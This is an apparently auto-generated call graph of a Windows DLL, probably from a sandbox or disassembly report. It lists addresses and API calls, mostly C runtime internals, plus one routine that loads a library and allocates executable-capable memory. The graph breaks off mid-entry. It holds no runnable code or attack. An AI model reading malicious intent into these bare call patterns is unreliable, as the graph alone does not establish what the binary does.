_invalid_parameter 17 API calls 18165->18167 18166->18138 18167->18166 18169 7fef9d35ecf 18168->18169 18170 7fef9d35fae 18169->18170 18171 7fef9d35f6e 18169->18171 18178 7fef9d35eda std::exception::_Copy_str _LocaleUpdate::~_LocaleUpdate 18169->18178 18173 7fef9d35fcf _CrtMemDumpAllObjectsSince 18170->18173 18174 7fef9d362e1 _CrtMemDumpAllObjectsSince 18170->18174 18172 7fef9d2bd70 _invalid_parameter 17 API calls 18171->18172 18172->18178 18176 7fef9d360a1 MultiByteToWideChar 18173->18176 18173->18178 18175 7fef9d3632f MultiByteToWideChar 18174->18175 18174->18178 18175->18178 18177 7fef9d3610e GetLastError 18176->18177 18176->18178 18177->18178 18180 7fef9d36154 _CrtMemDumpAllObjectsSince wcsxfrm 18177->18180 18178->18165 18179 7fef9d36238 MultiByteToWideChar 18179->18178 18180->18178 18180->18179 16474 7fef9d26ff2 16475 7fef9d26ffe 16474->16475 16478 7fef9d2ca00 16475->16478 16477 7fef9d27011 _initterm_e 16479 7fef9d2ca0e 16478->16479 16480 7fef9d2ca23 EncodePointer 16479->16480 16481 7fef9d2ca4b 16479->16481 16480->16479 16481->16477 18650 7fef9d3e2fc 18651 7fef9d3e309 get_int64_arg _get_printf_count_output 18650->18651 18652 7fef9d3e38c 18651->18652 18654 7fef9d3e3e1 18651->18654 18658 7fef9d2bd70 _invalid_parameter 17 API calls 18652->18658 18653 7fef9d3da75 18667 7fef9d3eca1 18653->18667 18671 7fef9d3dbb5 18653->18671 18654->18653 18655 7fef9d3eadf 18654->18655 18656 7fef9d3eec0 25 API calls 18654->18656 18657 7fef9d3ef10 25 API calls 18655->18657 18656->18655 18659 7fef9d3eafd 18657->18659 18670 7fef9d3dbe9 _LocaleUpdate::~_LocaleUpdate 18658->18670 18660 7fef9d3eb33 18659->18660 18662 7fef9d3eec0 25 API calls 18659->18662 18661 7fef9d3ec29 18660->18661 18674 7fef9d3eb49 _CrtMemDumpAllObjectsSince 18660->18674 18663 7fef9d3ebda 18661->18663 18664 7fef9d3ef10 25 API calls 18661->18664 18662->18660 18663->18653 18669 7fef9d3eec0 25 API calls 18663->18669 18664->18663 18665 7fef9d23280 __GSHandlerCheck 8 API calls 18666 7fef9d3ed9e 18665->18666 18668 7fef9d2bd70 _invalid_parameter 17 API calls 18667->18668 18667->18670 18668->18670 18669->18653 18670->18665 18673 7fef9d2bd70 _invalid_parameter 17 API calls 18671->18673 18672 7fef9d3f000 wcsxfrm 2 API calls 18672->18674 18673->18670 18674->18663 18674->18672 18675 7fef9d3ee40 25 API calls 18674->18675 18675->18674 18181 7fef9d253fb 18182 7fef9d2541d _realloc_dbg 18181->18182 18184 7fef9d25421 18182->18184 18187 7fef9d26380 18182->18187 18185 7fef9d254de _calloc_dbg_impl _realloc_dbg 18186 7fef9d2c020 _free_base 2 API calls 18185->18186 18186->18184 18188 7fef9d26395 _CrtIsValidPointer 18187->18188 18189 7fef9d26391 18187->18189 18188->18189 18190 7fef9d263b6 HeapValidate 18188->18190 18189->18185 18190->18189 16507 7fef9d235e1 16508 7fef9d235f1 16507->16508 16512 7fef9d235ea 16507->16512 16508->16512 16513 7fef9d212b0 16508->16513 16511 7fef9d212b0 14 API calls 16511->16512 16514 7fef9d212de CoLoadLibrary 16513->16514 16515 7fef9d22f8c 16513->16515 16517 7fef9d22f0f MessageBoxA ExitProcess 16514->16517 16518 7fef9d22f2e VirtualAlloc RtlAllocateHeap 16514->16518 16516 7fef9d23280 __GSHandlerCheck 8 API calls 16515->16516 16519 7fef9d230ff 16516->16519 16518->16515 16520 7fef9d22f73 _calloc_dbg_impl 16518->16520 16519->16511 16519->16512 16521 7fef9d22f83 CoTaskMemFree 16520->16521 16521->16515 18191 7fef9d23fe1 18192 7fef9d23fea SetLastError 18191->18192 16522 7fef9d27de0 16523 7fef9d27ded 16522->16523 16527 7fef9d27df2 std::exception::_Copy_str _calloc_dbg 16522->16527 16529 7fef9d2aa40 16523->16529 16525 7fef9d27e0e 16527->16525 16533 7fef9d2d490 16527->16533 16543 7fef9d27ff0 16527->16543 16530 7fef9d2aa57 16529->16530 16531 7fef9d2aa4d 16529->16531 16530->16527 16547 7fef9d29c10 16531->16547 16535 7fef9d2d4b1 16533->16535 16534 7fef9d2d512 16536 7fef9d2bd70 _invalid_parameter 17 API calls 16534->16536 16535->16534 16539 7fef9d2d550 _calloc_dbg_impl 16535->16539 16538 7fef9d2d546 _calloc_dbg_impl 16536->16538 16537 7fef9d2d63e 16541 7fef9d2bd70 _invalid_parameter 17 API calls 16537->16541 16538->16527 16539->16537 16540 7fef9d2d67c _calloc_dbg_impl 16539->16540 16540->16538 16542 7fef9d2bd70 _invalid_parameter 17 API calls 16540->16542 16541->16538 16542->16538 16544 7fef9d28010 16543->16544 16545 7fef9d2800e 16543->16545 16546 7fef9d2be00 _invoke_watson_if_error 16 API calls 16544->16546 16545->16527 16546->16545 16548 7fef9d29c2a 16547->16548 16557 7fef9d29b10 16548->16557 16550 7fef9d29c34 16561 7fef9d29f20 16550->16561 16552 7fef9d29c51 16554 7fef9d29ecd 16552->16554 16567 7fef9d2a000 16552->16567 16554->16530 16555 7fef9d29ce8 16555->16554 16580 7fef9d29360 LeaveCriticalSection 16555->16580 16558 7fef9d29b19 16557->16558 16559 7fef9d29bde 16558->16559 16581 7fef9d29360 LeaveCriticalSection 16558->16581 16559->16550 16562 7fef9d29f49 16561->16562 16563 7fef9d29f81 16562->16563 16564 7fef9d29f5b GetOEMCP 16562->16564 16565 7fef9d29f88 GetACP 16563->16565 16566 7fef9d29f79 _CrtMemDumpAllObjectsSince _LocaleUpdate::~_LocaleUpdate 16563->16566 16564->16566 16565->16566 16566->16552 16568 7fef9d29f20 __initmbctable 2 API calls 16567->16568 16569 7fef9d2a028 16568->16569 16570 7fef9d2a234 16569->16570 16571 7fef9d2a08e __initmbctable 16569->16571 16576 7fef9d2a039 __initmbctable 16569->16576 16574 7fef9d2a25d IsValidCodePage 16570->16574 16570->16576 16582 7fef9d2a5e0 GetCPInfo 16571->16582 16572 7fef9d23280 __GSHandlerCheck 8 API calls 16573 7fef9d2a470 16572->16573 16573->16555 16575 7fef9d2a27b GetCPInfo 16574->16575 16574->16576 16575->16576 16579 7fef9d2a295 __initmbctable 16575->16579 16576->16572 16578 7fef9d2a5e0 __initmbctable 19 API calls 16578->16576 16579->16578 16580->16554 16581->16559 16585 7fef9d2a61f 16582->16585 16591 7fef9d2a7dc 16582->16591 16583 7fef9d23280 __GSHandlerCheck 8 API calls 16584 7fef9d2aa30 16583->16584 16584->16576 16586 7fef9d2f4d0 _CrtMemDumpAllObjectsSince_stat 3 API calls 16585->16586 16587 7fef9d2a734 16586->16587 16593 7fef9d2ef00 16587->16593 16589 7fef9d2a788 16590 7fef9d2ef00 __initmbctable 7 API calls 16589->16590 16590->16591 16591->16583 16592 7fef9d2a80a 16591->16592 16592->16576 16594 7fef9d2ef2c _CrtMemDumpAllObjectsSince 16593->16594 16597 7fef9d2efb0 16594->16597 16596 7fef9d2ef8e _LocaleUpdate::~_LocaleUpdate 16596->16589 16598 7fef9d2efd4 __initmbctable 16597->16598 16599 7fef9d2f068 MultiByteToWideChar 16598->16599 16600 7fef9d2f0a5 _CrtMemDumpAllObjectsSince_stat 16599->16600 16604 7fef9d2f0ac malloc _MarkAllocaS 16599->16604 16600->16596 16601 7fef9d2f122 MultiByteToWideChar 16601->16600 16602 7fef9d2f164 LCMapStringW 16601->16602 16602->16600 16603 7fef9d2f1a8 16602->16603 16605 7fef9d2f1b8 16603->16605 16611 7fef9d2f222 malloc _MarkAllocaS 16603->16611 16604->16600 16604->16601 16605->16600 16606 7fef9d2f1d9 LCMapStringW 16605->16606 16606->16600 16607 7fef9d2f2ac LCMapStringW 16607->16600 16608 7fef9d2f2ea 16607->16608 16609 7fef9d2f341 WideCharToMultiByte 16608->16609 16610 7fef9d2f2f4 WideCharToMultiByte 16608->16610 16609->16600 16610->16600 16611->16600 16611->16607 18687 7fef9d312e3 LoadLibraryW 18688 7fef9d31304 GetProcAddress 18687->18688 18689 7fef9d312fd 18687->18689 18688->18689 18690 7fef9d3132a 7 API calls 18688->18690 18691 7fef9d23280 __GSHandlerCheck 8 API calls 18689->18691 18692 7fef9d313b3 GetProcAddress EncodePointer 18690->18692 18693 7fef9d313d5 18690->18693 18694 7fef9d3157a 18691->18694 18692->18693 18695 7fef9d313f9 DecodePointer DecodePointer 18693->18695 18697 7fef9d31428 DecodePointer 18693->18697 18695->18697 18697->18689 17592 7fef9d344e5 17596 7fef9d3445a __SehTransFilter 17592->17596 17593 7fef9d347d7 17594 7fef9d3485b 17593->17594 17595 7fef9d2cf80 _inconsistency 36 API calls 17593->17595 17595->17594 17597 7fef9d3466c __SehTransFilter 17596->17597 17604 7fef9d35180 17596->17604 17597->17593 17611 7fef9d35bb0 17597->17611 17600 7fef9d34727 17600->17593 17601 7fef9d2e500 __GetUnwindTryBlock 37 API calls 17600->17601 17602 7fef9d34767 17601->17602 17617 7fef9d2edc0 RtlUnwindEx 17602->17617 17605 7fef9d2e500 __GetUnwindTryBlock 37 API calls 17604->17605 17606 7fef9d351c1 17605->17606 17607 7fef9d351f0 __SehTransFilter 17606->17607 17620 7fef9d35970 17606->17620 17609 7fef9d2edc0 __SehTransFilter 9 API calls 17607->17609 17610 7fef9d35259 17609->17610 17610->17596 17612 7fef9d35bc6 17611->17612 17613 7fef9d35bc8 17611->17613 17615 7fef9d2cf50 terminate 35 API calls 17612->17615 17616 7fef9d35bda __SehTransFilter 17612->17616 17614 7fef9d2cf80 _inconsistency 36 API calls 17613->17614 17614->17612 17615->17616 17616->17600 17618 7fef9d23280 __GSHandlerCheck 8 API calls 17617->17618 17619 7fef9d2eee7 17618->17619 17619->17593 17621 7fef9d35998 17620->17621 17624 7fef9d355f0 17621->17624 17623 7fef9d359d3 __SehTransFilter __AdjustPointer 17623->17607 17625 7fef9d3561e __SehTransFilter 17624->17625 17626 7fef9d35765 17625->17626 17627 7fef9d356fa _ValidateRead 17625->17627 17635 7fef9d356aa __SehTransFilter __AdjustPointer 17625->17635 17629 7fef9d3577a _ValidateRead 17626->17629 17630 7fef9d35813 __SehTransFilter 17626->17630 17628 7fef9d2cf80 _inconsistency 36 API calls 17627->17628 17627->17635 17628->17635 17631 7fef9d2cf80 _inconsistency 36 API calls 17629->17631 17629->17635 17632 7fef9d3584d _ValidateRead 17630->17632 17636 7fef9d358c6 __SehTransFilter _ValidateExecute _ValidateRead 17630->17636 17631->17635 17633 7fef9d2cf80 _inconsistency 36 API calls 17632->17633 17632->17635 17633->17635 17634 7fef9d2cf80 _inconsistency 36 API calls 17634->17635 17635->17623 17636->17634 17636->17635 18193 7fef9d3bfde 18202 7fef9d3c00c 18193->18202 18194 7fef9d3b99c 18195 7fef9d3cc93 18194->18195 18200 7fef9d3bada 18194->18200 18196 7fef9d2bd70 _invalid_parameter 17 API calls 18195->18196 18199 7fef9d3bb0e _LocaleUpdate::~_LocaleUpdate 18195->18199 18196->18199 18197 7fef9d3b530 wctomb_s 19 API calls 18197->18202 18198 7fef9d23280 __GSHandlerCheck 8 API calls 18201 7fef9d3cd90 18198->18201 18199->18198 18203 7fef9d2bd70 _invalid_parameter 17 API calls 18200->18203 18202->18194 18202->18197 18203->18199 17029 7fef9d35de0 17034 7fef9d23170 17029->17034 17031 7fef9d35e86 17035 7fef9d231ac 17034->17035 17036 7fef9d23280 __GSHandlerCheck 8 API calls 17035->17036 17037 7fef9d23263 17036->17037 17037->17031 17038 7fef9d23870 17037->17038 17039 7fef9d239db __SehTransFilter 17038->17039 17040 7fef9d238de __SehTransFilter 17038->17040 17039->17031 17040->17039 17041 7fef9d23a71 RtlUnwindEx 17040->17041 17041->17039 17042 7fef9d3ade0 17047 7fef9d3fee0 17042->17047 17045 7fef9d3adf9 17057 7fef9d3ff00 17047->17057 17049 7fef9d3ade9 17049->17045 17050 7fef9d3fc70 17049->17050 17056 7fef9d3fc86 17050->17056 17051 7fef9d3fd59 17128 7fef9d29360 LeaveCriticalSection 17051->17128 17053 7fef9d3fd63 17053->17045 17055 7fef9d3fd09 DeleteCriticalSection 17055->17056 17056->17051 17056->17055 17117 7fef9d40580 17056->17117 17058 7fef9d3ff22 17057->17058 17059 7fef9d40042 17058->17059 17060 7fef9d3ff47 17058->17060 17090 7fef9d29360 LeaveCriticalSection 17059->17090 17061 7fef9d4003d 17060->17061 17072 7fef9d3ae90 17060->17072 17061->17049 17063 7fef9d4004c 17063->17049 17065 7fef9d3ff97 17066 7fef9d3ffd0 17065->17066 17068 7fef9d3ffe1 17065->17068 17069 7fef9d3ffbb 17065->17069 17085 7fef9d3af60 17066->17085 17068->17066 17071 7fef9d3fd70 _fflush_nolock 25 API calls 17068->17071 17075 7fef9d3fd70 17069->17075 17071->17066 17073 7fef9d3aec8 EnterCriticalSection 17072->17073 17074 7fef9d3aea4 17072->17074 17073->17074 17074->17065 17076 7fef9d3fd81 17075->17076 17077 7fef9d3fd8a 17075->17077 17078 7fef9d3ff00 _fflush_nolock 25 API calls 17076->17078 17091 7fef9d3fdf0 17077->17091 17084 7fef9d3fd88 17078->17084 17080 7fef9d3fd94 17080->17084 17095 7fef9d3afb0 17080->17095 17084->17066 17086 7fef9d3af74 17085->17086 17087 7fef9d3af98 LeaveCriticalSection 17085->17087 17116 7fef9d29360 LeaveCriticalSection 17086->17116 17088 7fef9d3af96 17087->17088 17088->17061 17090->17063 17092 7fef9d3fe1f 17091->17092 17094 7fef9d3fe5d 17091->17094 17093 7fef9d3afb0 _fflush_nolock 17 API calls 17092->17093 17092->17094 17093->17094 17094->17080 17097 7fef9d3afc1 17095->17097 17096 7fef9d3b04b 17099 7fef9d407c0 17096->17099 17097->17096 17098 7fef9d2bd70 _invalid_parameter 17 API calls 17097->17098 17098->17096 17100 7fef9d407d3 17099->17100 17101 7fef9d407e8 17099->17101 17100->17084 17102 7fef9d40851 17101->17102 17108 7fef9d4088f 17101->17108 17103 7fef9d2bd70 _invalid_parameter 17 API calls 17102->17103 17103->17100 17104 7fef9d40913 17109 7fef9d2bd70 _invalid_parameter 17 API calls 17104->17109 17105 7fef9d40951 17106 7fef9d3fae0 _fflush_nolock 3 API calls 17105->17106 17107 7fef9d4095a 17106->17107 17110 7fef9d3f900 _fflush_nolock 17 API calls 17107->17110 17114 7fef9d409ab __doserrno 17107->17114 17108->17104 17108->17105 17109->17100 17111 7fef9d40992 FlushFileBuffers 17110->17111 17112 7fef9d4099f GetLastError 17111->17112 17111->17114 17112->17114 17115 7fef9d3fbc0 LeaveCriticalSection 17114->17115 17115->17100 17116->17088 17118 7fef9d40599 17117->17118 17119 7fef9d405ef 17118->17119 17120 7fef9d4062a 17118->17120 17123 7fef9d2bd70 _invalid_parameter 17 API calls 17119->17123 17125 7fef9d40623 17120->17125 17129 7fef9d3ae10 17120->17129 17122 7fef9d40651 17133 7fef9d40680 17122->17133 17123->17125 17125->17056 17126 7fef9d4065c 17144 7fef9d3aee0 17126->17144 17128->17053 17130 7fef9d3ae77 EnterCriticalSection 17129->17130 17131 7fef9d3ae27 17129->17131 17132 7fef9d3ae3b 17130->17132 17131->17130 17131->17132 17132->17122 17134 7fef9d40699 17133->17134 17135 7fef9d406ef 17134->17135 17136 7fef9d4072d 17134->17136 17140 7fef9d2bd70 _invalid_parameter 17 API calls 17135->17140 17137 7fef9d40723 17136->17137 17138 7fef9d3fdf0 _fflush_nolock 17 API calls 17136->17138 17137->17126 17139 7fef9d40752 17138->17139 17141 7fef9d3afb0 _fflush_nolock 17 API calls 17139->17141 17140->17137 17142 7fef9d4076a 17141->17142 17150 7fef9d40a20 17142->17150 17145 7fef9d3af47 LeaveCriticalSection 17144->17145 17146 7fef9d3aef7 17144->17146 17148 7fef9d3af45 17145->17148 17146->17145 17147 7fef9d3af0b 17146->17147 17186 7fef9d29360 LeaveCriticalSection 17147->17186 17148->17125 17151 7fef9d40a53 17150->17151 17157 7fef9d40a33 __doserrno 17150->17157 17152 7fef9d40b05 17151->17152 17153 7fef9d40abc __doserrno 17151->17153 17154 7fef9d40bd2 17152->17154 17159 7fef9d40b89 __doserrno 17152->17159 17156 7fef9d2bd70 _invalid_parameter 17 API calls 17153->17156 17155 7fef9d3fae0 _fflush_nolock 3 API calls 17154->17155 17158 7fef9d40bdb 17155->17158 17156->17157 17157->17137 17162 7fef9d40c13 17158->17162 17164 7fef9d40c80 17158->17164 17161 7fef9d2bd70 _invalid_parameter 17 API calls 17159->17161 17161->17157 17177 7fef9d3fbc0 LeaveCriticalSection 17162->17177 17165 7fef9d3f900 _fflush_nolock 17 API calls 17164->17165 17168 7fef9d40c91 17165->17168 17166 7fef9d40d05 17178 7fef9d3f7d0 17166->17178 17168->17166 17169 7fef9d40ce5 17168->17169 17170 7fef9d3f900 _fflush_nolock 17 API calls 17168->17170 17169->17166 17171 7fef9d3f900 _fflush_nolock 17 API calls 17169->17171 17172 7fef9d40cd6 17170->17172 17173 7fef9d40cf8 CloseHandle 17171->17173 17174 7fef9d3f900 _fflush_nolock 17 API calls 17172->17174 17173->17166 17175 7fef9d40d0f GetLastError 17173->17175 17174->17169 17175->17166 17176 7fef9d40d22 _dosmaperr 17176->17162 17177->17157 17179 7fef9d3f7e3 17178->17179 17180 7fef9d3f878 __doserrno 17178->17180 17179->17180 17181 7fef9d3f87a SetStdHandle 17179->17181 17182 7fef9d3f86a 17179->17182 17180->17176 17181->17180 17183 7fef9d3f871 17182->17183 17184 7fef9d3f889 SetStdHandle 17182->17184 17183->17180 17185 7fef9d3f898 SetStdHandle 17183->17185 17184->17180 17185->17180 17186->17148 17637 7fef9d348e0 17638 7fef9d348f7 std::bad_exception::~bad_exception 17637->17638 17639 7fef9d3490c 17638->17639 17641 7fef9d3d710 17638->17641 17642 7fef9d3d721 17641->17642 17643 7fef9d3d726 17641->17643 17642->17639 17645 7fef9d29360 LeaveCriticalSection 17643->17645 17645->17642 18725 7fef9d27ae3 18728 7fef9d27af3 18725->18728 18726 7fef9d27ce0 SetHandleCount 18727 7fef9d27c74 18726->18727 18728->18726 18729 7fef9d27b95 GetStdHandle 18728->18729 18730 7fef9d27c7b 18728->18730 18729->18730 18731 7fef9d27bb9 18729->18731 18730->18726 18731->18730 18732 7fef9d27bc8 GetFileType 18731->18732 18732->18730 18733 7fef9d27beb InitializeCriticalSectionAndSpinCount 18732->18733 18733->18727 18733->18730 17646 7fef9d314e1 17647 7fef9d314ef DecodePointer 17646->17647 17648 7fef9d31520 DecodePointer 17646->17648 17647->17648 17649 7fef9d3150f 17647->17649 17650 7fef9d31540 17648->17650 17649->17648 17651 7fef9d23280 __GSHandlerCheck 8 API calls 17650->17651 17652 7fef9d3157a 17651->17652 18210 7fef9d2a7e9 18211 7fef9d2a7f9 18210->18211 18212 7fef9d23280 __GSHandlerCheck 8 API calls 18211->18212 18213 7fef9d2a80a 18211->18213 18214 7fef9d2aa30 18212->18214 18215 7fef9d2c7e9 18216 7fef9d2c90c EncodePointer EncodePointer 18215->18216 18218 7fef9d2c80d 18215->18218 18217 7fef9d2c8ca 18216->18217 18221 7fef9d2c872 18218->18221 18224 7fef9d24a00 18218->18224 18220 7fef9d24a00 _realloc_dbg 30 API calls 18222 7fef9d2c8bd 18220->18222 18221->18217 18221->18220 18223 7fef9d2c8ce EncodePointer 18221->18223 18222->18217 18222->18223 18223->18216 18225 7fef9d24a22 18224->18225 18230 7fef9d24a70 18225->18230 18227 7fef9d24a4c 18241 7fef9d29360 LeaveCriticalSection 18227->18241 18229 7fef9d24a5b 18229->18221 18232 7fef9d24ad4 _realloc_dbg 18230->18232 18233 7fef9d24aae _calloc_dbg_impl 18230->18233 18231 7fef9d26380 _CrtIsValidHeapPointer HeapValidate 18238 7fef9d24e2c 18231->18238 18232->18231 18232->18233 18233->18227 18234 7fef9d24f90 18257 7fef9d2ba60 18234->18257 18235 7fef9d24f64 18242 7fef9d2bc30 18235->18242 18238->18233 18238->18234 18238->18235 18239 7fef9d24fa6 18239->18233 18240 7fef9d24fba HeapSize 18239->18240 18240->18233 18241->18229 18243 7fef9d2bc50 18242->18243 18244 7fef9d2bc5f 18242->18244 18268 7fef9d2abf0 18243->18268 18246 7fef9d2bc67 18244->18246 18248 7fef9d2bc78 18244->18248 18247 7fef9d2c020 _free_base 2 API calls 18246->18247 18252 7fef9d2bc5a _get_errno_from_oserr 18247->18252 18249 7fef9d2bcba 18248->18249 18250 7fef9d2bc9a HeapReAlloc 18248->18250 18253 7fef9d2bce4 18248->18253 18255 7fef9d2abb0 _callnewh DecodePointer 18248->18255 18256 7fef9d2bd1f GetLastError 18248->18256 18251 7fef9d2abb0 _callnewh DecodePointer 18249->18251 18250->18248 18251->18252 18252->18233 18253->18252 18254 7fef9d2bcee GetLastError 18253->18254 18254->18252 18255->18248 18256->18252 18258 7fef9d2ba76 18257->18258 18259 7fef9d2bacc 18258->18259 18260 7fef9d2bb07 18258->18260 18263 7fef9d2bd70 _invalid_parameter 17 API calls 18259->18263 18261 7fef9d2bb32 HeapSize HeapReAlloc 18260->18261 18265 7fef9d2bb00 _get_errno_from_oserr 18260->18265 18262 7fef9d2bb74 18261->18262 18261->18265 18264 7fef9d2bba0 GetLastError 18262->18264 18274 7fef9d2bbd0 HeapQueryInformation 18262->18274 18263->18265 18264->18265 18265->18239 18269 7fef9d2ac4d 18268->18269 18271 7fef9d2ac0a 18268->18271 18270 7fef9d2abb0 _callnewh DecodePointer 18269->18270 18272 7fef9d2ac21 18270->18272 18271->18272 18273 7fef9d2abb0 _callnewh DecodePointer 18271->18273 18272->18252 18273->18271 18275 7fef9d2bb90 18274->18275 18275->18264 18275->18265 18739 7fef9d39aeb 18740 7fef9d39b2c 18739->18740 18741 7fef9d39b18 18739->18741 18742 7fef9d3ab10 17 API calls 18740->18742 18743 7fef9d39520 19 API calls 18741->18743 18746 7fef9d39b38 18742->18746 18743->18740 18744 7fef9d39c04 18745 7fef9d3a1cb 18744->18745 18749 7fef9d39c23 GetConsoleCP 18744->18749 18747 7fef9d3a205 18745->18747 18748 7fef9d3a8ad WriteFile 18745->18748 18746->18744 18753 7fef9d39bae GetConsoleMode 18746->18753 18750 7fef9d3a400 18747->18750 18751 7fef9d3a21a 18747->18751 18752 7fef9d3a923 GetLastError 18748->18752 18772 7fef9d39dd9 _dosmaperr __doserrno 18748->18772 18775 7fef9d39c4d 18749->18775 18767 7fef9d3a40e 18750->18767 18773 7fef9d3a5f3 18750->18773 18754 7fef9d3a33e WriteFile 18751->18754 18751->18772 18752->18772 18753->18744 18754->18751 18758 7fef9d3a3ea GetLastError 18754->18758 18755 7fef9d23280 __GSHandlerCheck 8 API calls 18760 7fef9d3a9f5 18755->18760 18756 7fef9d39f66 WideCharToMultiByte 18761 7fef9d39fbf WriteFile 18756->18761 18756->18772 18757 7fef9d3a726 WideCharToMultiByte 18762 7fef9d3a791 GetLastError 18757->18762 18757->18773 18758->18772 18759 7fef9d3a531 WriteFile 18763 7fef9d3a5dd GetLastError 18759->18763 18759->18767 18764 7fef9d3a050 GetLastError 18761->18764 18761->18775 18762->18772 18763->18772 18764->18772 18765 7fef9d3a7b0 WriteFile 18768 7fef9d3a857 GetLastError 18765->18768 18765->18773 18766 7fef9d3fc00 WriteConsoleW CreateFileW _putwch_nolock 18766->18775 18767->18759 18767->18772 18768->18773 18769 7fef9d3a158 GetLastError 18769->18772 18770 7fef9d3f330 MultiByteToWideChar MultiByteToWideChar wcsxfrm 18770->18775 18771 7fef9d3a06d WriteFile 18774 7fef9d3a103 GetLastError 18771->18774 18771->18775 18772->18755 18773->18757 18773->18765 18773->18772 18774->18772 18775->18756 18775->18766 18775->18769 18775->18770 18775->18771 18775->18772 18776 7fef9d3a1b5 GetLastError 18775->18776 18776->18772 17653 7fef9d270e6 17654 7fef9d27090 _exit 33 API calls 17653->17654 17655 7fef9d270f0 17654->17655 17205 7fef9d291ea 17206 7fef9d291ef 17205->17206 17207 7fef9d274e0 __crtExitProcess 3 API calls 17206->17207 17208 7fef9d29203 17207->17208 17209 7fef9d375e9 17212 7fef9d375fb 17209->17212 17214 7fef9d375f4 17209->17214 17210 7fef9d23280 __GSHandlerCheck 8 API calls 17211 7fef9d37d85 17210->17211 17213 7fef9d2bd70 _invalid_parameter 17 API calls 17212->17213 17213->17214 17214->17210 17666 7fef9d2d0ea 17667 7fef9d2d0ef 17666->17667 17668 7fef9d27090 _exit 33 API calls 17667->17668 17669 7fef9d2d209 17667->17669 17673 7fef9d2d0fc 17667->17673 17668->17669 17671 7fef9d2d289 17669->17671 17674 7fef9d23d00 RtlEncodePointer 17669->17674 17671->17673 17675 7fef9d29360 LeaveCriticalSection 17671->17675 17674->17671 17675->17673 17215 7fef9d25991 17216 7fef9d25996 _calloc_dbg_impl 17215->17216 17219 7fef9d2c020 17216->17219 17218 7fef9d259d5 17220 7fef9d2c039 _get_errno_from_oserr 17219->17220 17221 7fef9d2c03b HeapFree 17219->17221 17220->17218 17221->17220 17222 7fef9d2c05a GetLastError 17221->17222 17222->17220 17223 7fef9d2c990 17227 7fef9d24980 17223->17227 17225 7fef9d2c9b8 EncodePointer 17226 7fef9d2c9e5 17225->17226 17228 7fef9d249cb _calloc_dbg_impl 17227->17228 17228->17225 18276 7fef9d35393 18277 7fef9d353a0 18276->18277 18278 7fef9d353b4 __SehTransFilter 18277->18278 18279 7fef9d353cc 18277->18279 18285 7fef9d354a0 RaiseException 18278->18285 18286 7fef9d354a0 RaiseException 18279->18286 18282 7fef9d2ed30 _FindAndUnlinkFrame 36 API calls 18284 7fef9d353e1 _IsExceptionObjectToBeDestroyed __SehTransFilter 18282->18284 18283 7fef9d353ca 18283->18282 18285->18283 18286->18283 18804 7fef9d34a95 18806 7fef9d34aad __SehTransFilter 18804->18806 18805 7fef9d34c2b 18806->18805 18807 7fef9d35180 __SehTransFilter 38 API calls 18806->18807 18807->18805 18808 7fef9d32695 18810 7fef9d326a0 18808->18810 18809 7fef9d326ab 18810->18809 18811 7fef9d2bd70 _invalid_parameter 17 API calls 18810->18811 18811->18809 16482 7fef9d23599 16485 7fef9d28900 16482->16485 16484 7fef9d2359e 16486 7fef9d28920 16485->16486 16487 7fef9d28936 GetSystemTimeAsFileTime GetCurrentProcessId GetCurrentThreadId GetTickCount QueryPerformanceCounter 16485->16487 16486->16484 16488 7fef9d289de 16487->16488 16488->16486 16489 7fef9d24399 16490 7fef9d243a6 16489->16490 16492 7fef9d24377 16489->16492 16492->16489 16492->16490 16493 7fef9d2abb0 DecodePointer 16492->16493 16494 7fef9d2abd3 16493->16494 16494->16492 17687 7fef9d2c080 HeapValidate 17688 7fef9d2c0a2 17687->17688 17247 7fef9d3b580 17248 7fef9d3b5fa 17247->17248 17249 7fef9d3b6cb 17248->17249 17250 7fef9d3b676 17248->17250 17251 7fef9d3afb0 _fflush_nolock 17 API calls 17249->17251 17254 7fef9d3b6fe 17249->17254 17252 7fef9d2bd70 _invalid_parameter 17 API calls 17250->17252 17251->17254 17258 7fef9d3b6aa _LocaleUpdate::~_LocaleUpdate 17252->17258 17253 7fef9d3b84d 17255 7fef9d2bd70 _invalid_parameter 17 API calls 17253->17255 17254->17253 17256 7fef9d3b8a2 17254->17256 17255->17258 17257 7fef9d3b915 17256->17257 17263 7fef9d3b96a 17256->17263 17261 7fef9d2bd70 _invalid_parameter 17 API calls 17257->17261 17259 7fef9d23280 __GSHandlerCheck 8 API calls 17258->17259 17260 7fef9d3cd90 17259->17260 17261->17258 17262 7fef9d3cc93 17262->17258 17264 7fef9d2bd70 _invalid_parameter 17 API calls 17262->17264 17263->17262 17265 7fef9d3bada 17263->17265 17264->17258 17266 7fef9d2bd70 _invalid_parameter 17 API calls 17265->17266 17266->17258 18291 7fef9d3df8d 18293 7fef9d3dfbb 18291->18293 18292 7fef9d3eadf 18295 7fef9d3ef10 25 API calls 18292->18295 18293->18292 18294 7fef9d3eec0 25 API calls 18293->18294 18302 7fef9d3da75 18293->18302 18294->18292 18296 7fef9d3eafd 18295->18296 18297 7fef9d3eb33 18296->18297 18299 7fef9d3eec0 25 API calls 18296->18299 18298 7fef9d3ec29 18297->18298 18312 7fef9d3eb49 _CrtMemDumpAllObjectsSince 18297->18312 18300 7fef9d3ebda 18298->18300 18301 7fef9d3ef10 25 API calls 18298->18301 18299->18297 18300->18302 18305 7fef9d3eec0 25 API calls 18300->18305 18301->18300 18303 7fef9d3eca1 18302->18303 18308 7fef9d3dbb5 18302->18308 18304 7fef9d2bd70 _invalid_parameter 17 API calls 18303->18304 18307 7fef9d3dbe9 _LocaleUpdate::~_LocaleUpdate 18303->18307 18304->18307 18305->18302 18306 7fef9d23280 __GSHandlerCheck 8 API calls 18309 7fef9d3ed9e 18306->18309 18307->18306 18311 7fef9d2bd70 _invalid_parameter 17 API calls 18308->18311 18310 7fef9d3f000 wcsxfrm 2 API calls 18310->18312 18311->18307 18312->18300 18312->18310 18313 7fef9d3ee40 25 API calls 18312->18313 18313->18312 17689 7fef9d210b0 17691 7fef9d210da 17689->17691 17690 7fef9d210fc 17693 7fef9d23280 __GSHandlerCheck 8 API calls 17690->17693 17691->17690 17692 7fef9d21000 4 API calls 17691->17692 17692->17690 17694 7fef9d2112c 17693->17694 18314 7fef9d39fba 18326 7fef9d39c4d 18314->18326 18315 7fef9d3a06d WriteFile 18316 7fef9d3a103 GetLastError 18315->18316 18315->18326 18323 7fef9d39dd9 _dosmaperr __doserrno 18316->18323 18317 7fef9d23280 __GSHandlerCheck 8 API calls 18319 7fef9d3a9f5 18317->18319 18318 7fef9d39f66 WideCharToMultiByte 18320 7fef9d39fbf WriteFile 18318->18320 18318->18323 18322 7fef9d3a050 GetLastError 18320->18322 18320->18326 18321 